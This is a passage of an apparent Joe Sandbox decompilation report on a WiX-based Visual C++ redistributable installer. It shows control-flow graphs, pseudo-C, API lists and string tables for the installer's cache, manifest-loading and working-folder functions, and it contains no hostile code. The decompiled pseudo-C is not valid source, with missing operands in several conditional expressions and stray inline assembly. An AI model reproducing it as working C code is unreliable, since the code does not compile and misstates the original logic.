                                                                          control_flow_graph 1215 284c4-28512 CreateFileW 1216 28514-28553 call 137d3 call 5012f 1215->1216 1217 28558-28568 call 547d3 1215->1217 1235 286fc-2870e call 3de36 1216->1235 1222 28580-28594 call 53db5 1217->1222 1223 2856a-2857b call 5012f 1217->1223 1232 28596-285aa call 5012f 1222->1232 1233 285af-285b4 1222->1233 1231 286f5-286f6 FindCloseChangeNotification 1223->1231 1231->1235 1232->1231 1233->1231 1234 285ba-285c9 SetFilePointerEx 1233->1234 1238 28603-28613 call 54cee 1234->1238 1239 285cb-285fe call 137d3 1234->1239 1246 28615-2861a 1238->1246 1247 2861f-28630 SetFilePointerEx 1238->1247 1249 286ed-286f4 call 5012f 1239->1249 1246->1249 1250 28632-28665 call 137d3 1247->1250 1251 2866a-2867a call 54cee 1247->1251 1249->1231 1250->1249 1251->1246 1258 2867c-2868c call 54cee 1251->1258 1258->1246 1262 2868e-2869f SetFilePointerEx 1258->1262 1263 286a1-286d4 call 137d3 1262->1263 1264 286d6-286dd call 54cee 1262->1264 1263->1249 1266 286e2-286e6 1264->1266 1266->1231 1268 286e8 1266->1268 1268->1249
                                                                          C-Code - Quality: 73%
                                                                          			E000284C4(void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t25;
				void* _t29;
				void* _t31;
				void* _t33;
				int _t37;
				void* _t39;
				int _t41;
				void* _t43;
				void* _t46;
				int _t48;
				void* _t50;
				signed short _t51;
				signed short _t54;
				signed short _t57;
				signed short _t62;
				intOrPtr _t66;
				WCHAR* _t67;
				void* _t73;
				void* _t75;
				signed int _t91;

				_t73 = __edx;
				_t25 =  *0x7a008; // 0xfbf51acb
				_v8 = _t25 ^ _t91;
				_t67 = _a12;
				_t66 = _a16;
				_t76 = _a4;
				_v28 = _a8;
				_v32 = _a4;
				asm("stosd");
				asm("stosd");
				_v24 = _t67;
				asm("stosd"); // executed
				_t29 = CreateFileW(_t67, 0x40000000, 5, 0, 2, 0x8000080, 0); // executed
				_t75 = _t29;
				if(_t75 != 0xffffffff) {
					_t31 = E000547D3(_t67, _t76, 0, 0, 0, 0); // executed
					_t77 = _t31;
					if(_t31 >= 0) {
						_t33 = E00053DB5(_t73, _v32, _t75,  *((intOrPtr*)(_t66 + 0xc)), 0, 0); // executed
						_t77 = _t33;
						if(_t77 >= 0) {
							if( *((intOrPtr*)(_t66 + 0x28)) != 0) {
								_push(0);
								_t37 = SetFilePointerEx(_t75,  *(_t66 + 0x18), 0, 0); // executed
								if(_t37 != 0) {
									_t39 = E00054CEE(0, _t75, _t66 + 0x24, 4); // executed
									if(_t39 >= 0) {
										_push(0);
										_t41 = SetFilePointerEx(_t75,  *(_t66 + 0x1c), 0, 0); // executed
										if(_t41 != 0) {
											_t43 = E00054CEE(0, _t75, _t66 + 0x28, 4); // executed
											_t77 = _t43;
											if(_t77 < 0) {
												goto L10;
											} else {
												_t46 = E00054CEE(0, _t75, _t66 + 0x2c, 4); // executed
												_t77 = _t46;
												if(_t77 < 0) {
													goto L10;
												} else {
													_push(0);
													_t48 = SetFilePointerEx(_t75,  *(_t66 + 0x20), 0, 0); // executed
													if(_t48 != 0) {
														_t50 = E00054CEE(0, _t75,  &_v20, 0xc); // executed
														_t77 = _t50;
														if(_t77 < 0) {
															_push("Failed to zero out original data offset.");
															goto L19;
														}
													} else {
														_t51 = GetLastError();
														_t81 =  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
														_t77 =  >=  ? 0x80004005 :  <=  ? _t51 : _t51 & 0x0000ffff | 0x80070000;
														E000137D3(0x80004005, "cache.cpp", 0x6d6, _t77);
														_push("Failed to seek to original data in exe burn section header.");
														goto L19;
													}
												}
											}
										} else {
											_t54 = GetLastError();
											_t84 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
											_t77 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
											E000137D3(0x80004005, "cache.cpp", 0x6c9, _t77);
											_push("Failed to seek to signature table in exe header.");
											goto L19;
										}
									} else {
										L10:
										_push("Failed to update signature offset.");
										goto L19;
									}
								} else {
									_t57 = GetLastError();
									_t87 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
									_t77 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
									E000137D3(0x80004005, "cache.cpp", 0x6bf, _t77);
									_push("Failed to seek to checksum in exe header.");
									L19:
									_push(_t77);
									E0005012F();
								}
							}
						} else {
							_push(_v24);
							E0005012F(_t77, "Failed to copy engine from: %ls to: %ls", _v28);
						}
					} else {
						E0005012F(_t77, "Failed to seek to beginning of engine file: %ls", _v28);
					}
					FindCloseChangeNotification(_t75); // executed
				} else {
					_t62 = GetLastError();
					_t90 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
					_t77 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "cache.cpp", 0x6af,  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000);
					E0005012F( >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000, "Failed to create engine file at path: %ls", _v24);
				}
				return E0003DE36(_t66, _v8 ^ _t91, _t73, _t75, _t77);
			}
































                                                                          0x000284c4
                                                                          0x000284ca
                                                                          0x000284d1
                                                                          0x000284d7
                                                                          0x000284db
                                                                          0x000284df
                                                                          0x000284e5
                                                                          0x000284f2
                                                                          0x000284f7
                                                                          0x00028501
                                                                          0x00028503
                                                                          0x00028506
                                                                          0x00028507
                                                                          0x0002850d
                                                                          0x00028512
                                                                          0x0002855f
                                                                          0x00028564
                                                                          0x00028568
                                                                          0x0002858b
                                                                          0x00028590
                                                                          0x00028594
                                                                          0x000285b4
                                                                          0x000285ba
                                                                          0x000285c1
                                                                          0x000285c9
                                                                          0x0002860a
                                                                          0x00028613
                                                                          0x00028621
                                                                          0x00028628
                                                                          0x00028630
                                                                          0x00028671
                                                                          0x00028676
                                                                          0x0002867a
                                                                          0x00000000
                                                                          0x0002867c
                                                                          0x00028683
                                                                          0x00028688
                                                                          0x0002868c
                                                                          0x00000000
                                                                          0x0002868e
                                                                          0x00028690
                                                                          0x00028697
                                                                          0x0002869f
                                                                          0x000286dd
                                                                          0x000286e2
                                                                          0x000286e6
                                                                          0x000286e8
                                                                          0x00000000
                                                                          0x000286e8
                                                                          0x000286a1
                                                                          0x000286a1
                                                                          0x000286b2
                                                                          0x000286bc
                                                                          0x000286ca
                                                                          0x000286cf
                                                                          0x00000000
                                                                          0x000286cf
                                                                          0x0002869f
                                                                          0x0002868c
                                                                          0x00028632
                                                                          0x00028632
                                                                          0x00028643
                                                                          0x0002864d
                                                                          0x0002865b
                                                                          0x00028660
                                                                          0x00000000
                                                                          0x00028660
                                                                          0x00028615
                                                                          0x00028615
                                                                          0x00028615
                                                                          0x00000000
                                                                          0x00028615
                                                                          0x000285cb
                                                                          0x000285cb
                                                                          0x000285dc
                                                                          0x000285e6
                                                                          0x000285f4
                                                                          0x000285f9
                                                                          0x000286ed
                                                                          0x000286ed
                                                                          0x000286ee
                                                                          0x000286f4
                                                                          0x000285c9
                                                                          0x00028596
                                                                          0x00028596
                                                                          0x000285a2
                                                                          0x000285a7
                                                                          0x0002856a
                                                                          0x00028573
                                                                          0x00028578
                                                                          0x000286f6
                                                                          0x00028514
                                                                          0x00028514
                                                                          0x00028525
                                                                          0x0002852f
                                                                          0x0002853d
                                                                          0x0002854b
                                                                          0x00028550
                                                                          0x0002870e

                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00014CB6,?,?,00000000,00014CB6,00000000), ref: 00028507
                                                                          • GetLastError.KERNEL32 ref: 00028514
                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,0005B4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000286F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseCreateErrorFileFindLastNotification
                                                                          • String ID: @Met$Failed to copy user from: %ls to: %ls$Failed to create user file at path: %ls$Failed to seek to beginning of user file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                          • API String ID: 4091947256-324234727
                                                                          • Opcode ID: 788919be38fd9f561398f03461ac679be6a0c1bf24bd98187009086be727eef9
                                                                          • Instruction ID: 62fd8bfa9e457a1779404226ae8a85d2bdd32104c15a26103de596e41121a74a
                                                                          • Opcode Fuzzy Hash: 788919be38fd9f561398f03461ac679be6a0c1bf24bd98187009086be727eef9
                                                                          • Instruction Fuzzy Hash: 7B51D176A41731BFFB216A689C4AFBF36A9EF04711F014125FE05EB281EB659C0087E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00027337 Relevance: 35.3, APIs: 1, Strings: 19, Instructions: 277COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1376 27337-2737c call 3f670 call 17503 1381 27388-27399 call 1c2a1 1376->1381 1382 2737e-27383 1376->1382 1387 273a5-273b6 call 1c108 1381->1387 1388 2739b-273a0 1381->1388 1383 27602-27609 call 5012f 1382->1383 1391 2760a-2760f 1383->1391 1395 273c2-273d7 call 1c362 1387->1395 1396 273b8-273bd 1387->1396 1388->1383 1393 27611-27612 call 554ef 1391->1393 1394 27617-2761b 1391->1394 1393->1394 1398 27625-2762a 1394->1398 1399 2761d-27620 call 554ef 1394->1399 1408 273e3-273f3 call 3bdc9 1395->1408 1409 273d9-273de 1395->1409 1396->1383 1401 27632-2763f call 1c055 1398->1401 1402 2762c-2762d call 554ef 1398->1402 1399->1398 1410 27641-27644 call 554ef 1401->1410 1411 27649-2764d 1401->1411 1402->1401 1417 273f5-273fa 1408->1417 1418 273ff-27472 call 25a35 1408->1418 1409->1383 1410->1411 1415 27657-2765b 1411->1415 1416 2764f-27652 call 554ef 1411->1416 1420 27665-2766d 1415->1420 1421 2765d-27660 call 13999 1415->1421 1416->1415 1417->1383 1425 27474-27479 1418->1425 1426 2747e-274c2 call 1550f GetCurrentProcess call 5076c call 18152 1418->1426 1421->1420 1425->1383 1433 274c4-274d7 call 5012f 1426->1433 1434 274dc-274e1 1426->1434 1433->1391 1435 274e3-274f5 call 180f6 1434->1435 1436 2753d-27542 1434->1436 1447 27501-27511 call 13446 1435->1447 1448 274f7-274fc 1435->1448 1439 27562-2756b 1436->1439 1440 27544-27556 call 180f6 1436->1440 1443 27577-27582 call 2a307 1439->1443 1444 2756d-27570 1439->1444 1440->1439 1451 27558-2755d 1440->1451 1454 27587-2758b 1443->1454 1444->1443 1449 27572-27575 1444->1449 1460 27513-27518 1447->1460 1461 2751d-27531 call 180f6 1447->1461 1448->1383 1449->1443 1452 2759a-2759d 1449->1452 1451->1383 1458 275a4-275ba call 1d497 1452->1458 1459 2759f-275a2 1452->1459 1456 27594 1454->1456 1457 2758d-27592 1454->1457 1456->1452 1457->1383 1466 275c3-275db call 1cabe 1458->1466 1467 275bc-275c1 1458->1467 1459->1391 1459->1458 1460->1383 1461->1436 1469 27533-27538 1461->1469 1471 275e4-275fb call 1c7df 1466->1471 1472 275dd-275e2 1466->1472 1467->1383 1469->1383 1471->1391 1475 275fd 1471->1475 1472->1383 1475->1383
                                                                          C-Code - Quality: 83%
                                                                          			E00027337(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v124;
				void* __ebx;
				void* __edi;
				void* _t70;
				intOrPtr _t73;
				intOrPtr _t76;
				intOrPtr _t81;
				intOrPtr _t96;
				intOrPtr _t105;
				intOrPtr _t106;
				intOrPtr* _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				void* _t140;
				void* _t141;
				intOrPtr _t142;
				intOrPtr _t149;
				intOrPtr _t152;

				_t140 = __edx;
				_v12 = 0;
				_v28 = 0;
				_v20 = 0;
				_v32 = 0;
				E0003F670(_t141,  &_v124, 0, 0x58);
				_t142 = _a4;
				_v36 = 0;
				_v8 = 0;
				_v16 = 0;
				_v24 = 0;
				_t11 = _t142 + 0x88; // 0x1533d
				_t135 = _t11;
				_t70 = E00017503(_t11); // executed
				if(_t70 >= 0) {
					_t13 = _t142 + 0x48; // 0x152fd
					_t73 = E0001C2A1(_t13,  &_v124); // executed
					__eflags = _t73;
					if(_t73 >= 0) {
						_t76 = E0001C108( &_v124,  &_v28);
						__eflags = _t76;
						if(_t76 >= 0) {
							__eflags = E0001C362( &_v124,  &_v20,  &_v32);
							if(__eflags >= 0) {
								_t81 = E0003BDC9(__eflags, _v20, _v32, _t142); // executed
								__eflags = _t81;
								if(_t81 >= 0) {
									_t22 = _t142 + 0x1c0; // 0x15475
									_t23 = _t142 + 0x4d8; // 0x1578d
									_t24 = _t142 + 0x140; // 0x153f5
									_t25 = _t142 + 0x400; // 0x156b5
									_t26 = _t142 + 0x3fc; // 0x156b1
									_t27 = _t142 + 0x4d4; // 0x15789
									_t30 = _t142 + 0x3ec; // 0x156a1
									_t31 = _t142 + 0x494; // 0x15749
									_t32 = _t142 + 0x490; // 0x15745
									_t136 = _t32;
									_t33 = _t142 + 0x4b8; // 0x1576d
									_t34 = _t142 + 0x4a0; // 0x15755
									_t35 = _t142 + 0x1c; // 0x152d1
									_t36 = _t142 + 0x4e0; // 0x485
									_t37 = _t142 + 0x4dc; // 0x48d016a
									_t96 = E00025A35( *_t37,  *_t36, _t35, _t34, _t33, _t135, _t32, _t31, _t30,  &_v8,  &_v24, _t27, _t26, _t25, _t24, _t23, _t22,  &_v12);
									__eflags = _t96;
									if(_t96 >= 0) {
										__eflags = _v12;
										_t98 =  !=  ? _v12 : 0x5b524;
										E0001550F(2, 0x20000009,  !=  ? _v12 : 0x5b524);
										E0005076C(GetCurrentProcess(),  &_v36); // executed
										asm("cdq");
										_t149 = E00018152(_t135, L"WixBundleElevated", _v36, _t140, 1);
										__eflags = _t149;
										if(_t149 >= 0) {
											_t105 = _v8;
											__eflags = _t105;
											if(_t105 == 0) {
												L21:
												_t106 = _v24;
												__eflags = _t106;
												if(_t106 == 0) {
													L24:
													_t47 = _t142 + 0x490; // 0x15745
													_t107 = _t47;
													__eflags =  *_t107;
													if( *_t107 == 0) {
														L27:
														_t49 = _t142 + 0x100; // 0x153b5
														_t109 = E0002A307(_t135, _t49, _t135, _v8); // executed
														__eflags = _t109;
														if(_t109 >= 0) {
															_t50 = _t142 + 0x490; // 0x15745
															_t107 = _t50;
															goto L30;
														} else {
															_push("Failed to initialize internal cache functionality.");
															goto L38;
														}
													} else {
														__eflags =  *_t107 - 1;
														if( *_t107 == 1) {
															goto L27;
														} else {
															__eflags =  *_t107 - 3;
															if( *_t107 != 3) {
																L30:
																__eflags =  *_t107 - 1;
																if(__eflags == 0) {
																	L32:
																	_t51 = _t142 + 0xcc; // 0x15381
																	_t135 = _t51;
																	_t52 = _t142 + 0x110; // 0xfff9e89d
																	_t110 = E0001D497(_t136, _t140, _t142, __eflags,  *_t52, _t51);
																	__eflags = _t110;
																	if(_t110 >= 0) {
																		_t54 = _t142 + 0xbc; // 0x15371
																		_t152 = E0001CABE(_t54, 0,  &_v124,  *_t135);
																		__eflags = _t152;
																		if(_t152 >= 0) {
																			_t55 = _t142 + 0xbc; // 0x15371
																			_t56 = _t142 + 0x2b0; // 0x15565
																			_t152 = E0001C7DF(_t140, _t56, _t55);
																			__eflags = _t152;
																			if(_t152 < 0) {
																				_push("Failed to load catalog files.");
																				goto L38;
																			}
																		} else {
																			_push("Failed to extract bootstrapper application payloads.");
																			goto L38;
																		}
																	} else {
																		_push("Failed to get unique temporary folder for bootstrapper application.");
																		goto L38;
																	}
																} else {
																	__eflags =  *_t107 - 3;
																	if(__eflags == 0) {
																		goto L32;
																	}
																}
															} else {
																goto L27;
															}
														}
													}
												} else {
													_t152 = E000180F6(_t135, L"WixBundleOriginalSource", _t106, 0);
													__eflags = _t152;
													if(_t152 >= 0) {
														goto L24;
													} else {
														_push("Failed to set original source variable.");
														goto L38;
													}
												}
											} else {
												_t152 = E000180F6(_t135, L"WixBundleSourceProcessPath", _t105, 1);
												__eflags = _t152;
												if(_t152 >= 0) {
													_t152 = E00013446(_t136, _v8,  &_v16);
													__eflags = _t152;
													if(_t152 >= 0) {
														_t152 = E000180F6(_t135, L"WixBundleSourceProcessFolder", _v16, 1);
														__eflags = _t152;
														if(_t152 >= 0) {
															goto L21;
														} else {
															_push("Failed to set source process folder variable.");
															goto L38;
														}
													} else {
														_push("Failed to get source process folder from path.");
														goto L38;
													}
												} else {
													_push("Failed to set source process path variable.");
													goto L38;
												}
											}
										} else {
											E0005012F(_t149, "Failed to overwrite the %ls built-in variable.", L"WixBundleElevated");
										}
									} else {
										_push("Failed to parse command line.");
										goto L38;
									}
								} else {
									_push("Failed to load manifest.");
									goto L38;
								}
							} else {
								_push("Failed to get manifest stream from container.");
								goto L38;
							}
						} else {
							_push("Failed to open manifest stream.");
							goto L38;
						}
					} else {
						_push("Failed to open attached UX container.");
						goto L38;
					}
				} else {
					_push("Failed to initialize variables.");
					L38:
					_push(_t152);
					E0005012F();
				}
				_t116 = _v24;
				if(_v24 != 0) {
					E000554EF(_t116);
				}
				if(_v16 != 0) {
					E000554EF(_v16);
				}
				_t117 = _v8;
				if(_v8 != 0) {
					E000554EF(_t117);
				}
				E0001C055(_t135,  &_v124);
				if(_v28 != 0) {
					E000554EF(_v28);
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				if(_v20 != 0) {
					E00013999(_v20); // executed
				}
				return _t152;
			}





























                                                                          0x00027337
                                                                          0x00027349
                                                                          0x0002734c
                                                                          0x0002734f
                                                                          0x00027352
                                                                          0x00027355
                                                                          0x0002735a
                                                                          0x00027360
                                                                          0x00027363
                                                                          0x00027366
                                                                          0x00027369
                                                                          0x0002736c
                                                                          0x0002736c
                                                                          0x00027373
                                                                          0x0002737c
                                                                          0x0002738c
                                                                          0x00027390
                                                                          0x00027397
                                                                          0x00027399
                                                                          0x000273ad
                                                                          0x000273b4
                                                                          0x000273b6
                                                                          0x000273d5
                                                                          0x000273d7
                                                                          0x000273ea
                                                                          0x000273f1
                                                                          0x000273f3
                                                                          0x00027403
                                                                          0x0002740a
                                                                          0x00027411
                                                                          0x00027418
                                                                          0x0002741f
                                                                          0x00027426
                                                                          0x00027435
                                                                          0x0002743c
                                                                          0x00027443
                                                                          0x00027443
                                                                          0x0002744b
                                                                          0x00027452
                                                                          0x00027459
                                                                          0x0002745d
                                                                          0x00027463
                                                                          0x00027469
                                                                          0x00027470
                                                                          0x00027472
                                                                          0x0002747e
                                                                          0x00027487
                                                                          0x00027493
                                                                          0x000274a6
                                                                          0x000274b0
                                                                          0x000274be
                                                                          0x000274c0
                                                                          0x000274c2
                                                                          0x000274dc
                                                                          0x000274df
                                                                          0x000274e1
                                                                          0x0002753d
                                                                          0x0002753d
                                                                          0x00027540
                                                                          0x00027542
                                                                          0x00027562
                                                                          0x00027562
                                                                          0x00027562
                                                                          0x00027568
                                                                          0x0002756b
                                                                          0x00027577
                                                                          0x0002757a
                                                                          0x00027582
                                                                          0x00027589
                                                                          0x0002758b
                                                                          0x00027594
                                                                          0x00027594
                                                                          0x00000000
                                                                          0x0002758d
                                                                          0x0002758d
                                                                          0x00000000
                                                                          0x0002758d
                                                                          0x0002756d
                                                                          0x0002756d
                                                                          0x00027570
                                                                          0x00000000
                                                                          0x00027572
                                                                          0x00027572
                                                                          0x00027575
                                                                          0x0002759a
                                                                          0x0002759a
                                                                          0x0002759d
                                                                          0x000275a4
                                                                          0x000275a4
                                                                          0x000275a4
                                                                          0x000275ab
                                                                          0x000275b1
                                                                          0x000275b8
                                                                          0x000275ba
                                                                          0x000275c9
                                                                          0x000275d7
                                                                          0x000275d9
                                                                          0x000275db
                                                                          0x000275e4
                                                                          0x000275eb
                                                                          0x000275f7
                                                                          0x000275f9
                                                                          0x000275fb
                                                                          0x000275fd
                                                                          0x00000000
                                                                          0x000275fd
                                                                          0x000275dd
                                                                          0x000275dd
                                                                          0x00000000
                                                                          0x000275dd
                                                                          0x000275bc
                                                                          0x000275bc
                                                                          0x00000000
                                                                          0x000275bc
                                                                          0x0002759f
                                                                          0x0002759f
                                                                          0x000275a2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000275a2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00027575
                                                                          0x00027570
                                                                          0x00027544
                                                                          0x00027552
                                                                          0x00027554
                                                                          0x00027556
                                                                          0x00000000
                                                                          0x00027558
                                                                          0x00027558
                                                                          0x00000000
                                                                          0x00027558
                                                                          0x00027556
                                                                          0x000274e3
                                                                          0x000274f1
                                                                          0x000274f3
                                                                          0x000274f5
                                                                          0x0002750d
                                                                          0x0002750f
                                                                          0x00027511
                                                                          0x0002752d
                                                                          0x0002752f
                                                                          0x00027531
                                                                          0x00000000
                                                                          0x00027533
                                                                          0x00027533
                                                                          0x00000000
                                                                          0x00027533
                                                                          0x00027513
                                                                          0x00027513
                                                                          0x00000000
                                                                          0x00027513
                                                                          0x000274f7
                                                                          0x000274f7
                                                                          0x00000000
                                                                          0x000274f7
                                                                          0x000274f5
                                                                          0x000274c4
                                                                          0x000274cf
                                                                          0x000274d4
                                                                          0x00027474
                                                                          0x00027474
                                                                          0x00000000
                                                                          0x00027474
                                                                          0x000273f5
                                                                          0x000273f5
                                                                          0x00000000
                                                                          0x000273f5
                                                                          0x000273d9
                                                                          0x000273d9
                                                                          0x00000000
                                                                          0x000273d9
                                                                          0x000273b8
                                                                          0x000273b8
                                                                          0x00000000
                                                                          0x000273b8
                                                                          0x0002739b
                                                                          0x0002739b
                                                                          0x00000000
                                                                          0x0002739b
                                                                          0x0002737e
                                                                          0x0002737e
                                                                          0x00027602
                                                                          0x00027602
                                                                          0x00027603
                                                                          0x00027609
                                                                          0x0002760a
                                                                          0x0002760f
                                                                          0x00027612
                                                                          0x00027612
                                                                          0x0002761b
                                                                          0x00027620
                                                                          0x00027620
                                                                          0x00027625
                                                                          0x0002762a
                                                                          0x0002762d
                                                                          0x0002762d
                                                                          0x00027636
                                                                          0x0002763f
                                                                          0x00027644
                                                                          0x00027644
                                                                          0x0002764d
                                                                          0x00027652
                                                                          0x00027652
                                                                          0x0002765b
                                                                          0x00027660
                                                                          0x00027660
                                                                          0x0002766d

                                                                          Strings
                                                                          • Failed to set source process path variable., xrefs: 000274F7
                                                                          • WixBundleElevated, xrefs: 000274B3, 000274C4
                                                                          • Failed to set source process folder variable., xrefs: 00027533
                                                                          • Failed to open attached UX container., xrefs: 0002739B
                                                                          • Failed to initialize variables., xrefs: 0002737E
                                                                          • Failed to get source process folder from path., xrefs: 00027513
                                                                          • WixBundleSourceProcessPath, xrefs: 000274E6
                                                                          • Failed to get unique temporary folder for bootstrapper application., xrefs: 000275BC
                                                                          • Failed to load catalog files., xrefs: 000275FD
                                                                          • Failed to parse command line., xrefs: 00027474
                                                                          • Failed to load manifest., xrefs: 000273F5
                                                                          • Failed to initialize internal cache functionality., xrefs: 0002758D
                                                                          • WixBundleSourceProcessFolder, xrefs: 00027522
                                                                          • Failed to open manifest stream., xrefs: 000273B8
                                                                          • Failed to set original source variable., xrefs: 00027558
                                                                          • Failed to extract bootstrapper application payloads., xrefs: 000275DD
                                                                          • Failed to overwrite the %ls built-in variable., xrefs: 000274C9
                                                                          • Failed to get manifest stream from container., xrefs: 000273D9
                                                                          • WixBundleOriginalSource, xrefs: 00027547
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection
                                                                          • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath
                                                                          • API String ID: 32694325-252221001
                                                                          • Opcode ID: 564a2fb453f089d867f136f3fb4852f88ce7f1615db8b185f9a8b1655f306bd6
                                                                          • Instruction ID: 3df8973cfc4b2863af24c93dfc649fcb7449c12a3e59fbb47cc16055a2364c8b
                                                                          • Opcode Fuzzy Hash: 564a2fb453f089d867f136f3fb4852f88ce7f1615db8b185f9a8b1655f306bd6
                                                                          • Instruction Fuzzy Hash: 76918872944A3ABBDB22DAA4DC55EEFB7ACBF04700F000226FA09E7141D771DA448BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000280AE Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 151COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1476 280ae-280f7 call 3f670 1479 28270-2827d call 121a5 1476->1479 1480 280fd-2810b GetCurrentProcess call 5076c 1476->1480 1487 2827f 1479->1487 1488 2828c-2829e call 3de36 1479->1488 1483 28110-2811d 1480->1483 1485 28123-28132 GetWindowsDirectoryW 1483->1485 1486 281ab-281b9 GetTempPathW 1483->1486 1492 28134-28167 call 137d3 1485->1492 1493 2816c-2817d call 1338f 1485->1493 1490 281f3-28205 UuidCreate 1486->1490 1491 281bb-281ee call 137d3 1486->1491 1494 28284-2828b call 5012f 1487->1494 1495 28207-2820c 1490->1495 1496 2820e-28223 StringFromGUID2 1490->1496 1491->1494 1492->1494 1507 28189-2819f call 136b4 1493->1507 1508 2817f-28184 1493->1508 1494->1488 1495->1494 1501 28241-28262 call 11f20 1496->1501 1502 28225-2823f call 137d3 1496->1502 1518 28264-28269 1501->1518 1519 2826b 1501->1519 1502->1494 1507->1490 1520 281a1-281a6 1507->1520 1508->1494 1518->1494 1519->1479 1520->1494
                                                                          C-Code - Quality: 52%
                                                                          			E000280AE(void* __edx, intOrPtr _a8) {
				signed int _v8;
				char _v88;
				short _v608;
				char _v624;
				signed int _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				intOrPtr _t23;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed short _t40;
				signed short _t48;
				intOrPtr _t51;
				void* _t52;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;

				_t57 = __edx;
				_t18 =  *0x7a008; // 0xfbf51acb
				_v8 = _t18 ^ _t68;
				_v628 = _v628 & 0x00000000;
				_t51 = _a8;
				E0003F670(_t58,  &_v608, 0, 0x208);
				_t59 =  &_v624;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t23 =  *0x7aa94; // 0x0
				if(_t23 != 0) {
					L17:
					_t60 = E000121A5(_t51, _t23, 0);
					__eflags = _t60;
					if(_t60 < 0) {
						_push("Failed to copy working folder path.");
						goto L19;
					}
				} else {
					E0005076C(GetCurrentProcess(),  &_v628); // executed
					if(_v628 == 0) {
						_t32 = GetTempPathW(0x104,  &_v608);
						__eflags = _t32;
						if(_t32 != 0) {
							goto L10;
						} else {
							_t40 = GetLastError();
							__eflags = _t40;
							_t64 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							__eflags = _t64;
							_t60 =  >=  ? 0x80004005 : _t64;
							E000137D3(0x80004005, "cache.cpp", 0x46b, _t60);
							_push("Failed to get temp path for working folder.");
							goto L19;
						}
					} else {
						_t59 = 0x104;
						if(GetWindowsDirectoryW( &_v608, 0x104) != 0) {
							_t60 = E0001338F(_t52, __eflags,  &_v608, 0x104);
							__eflags = _t60;
							if(_t60 >= 0) {
								_t60 = E000136B4(_t52,  &_v608, 0x104, L"Temp\\");
								__eflags = _t60;
								if(_t60 >= 0) {
									L10:
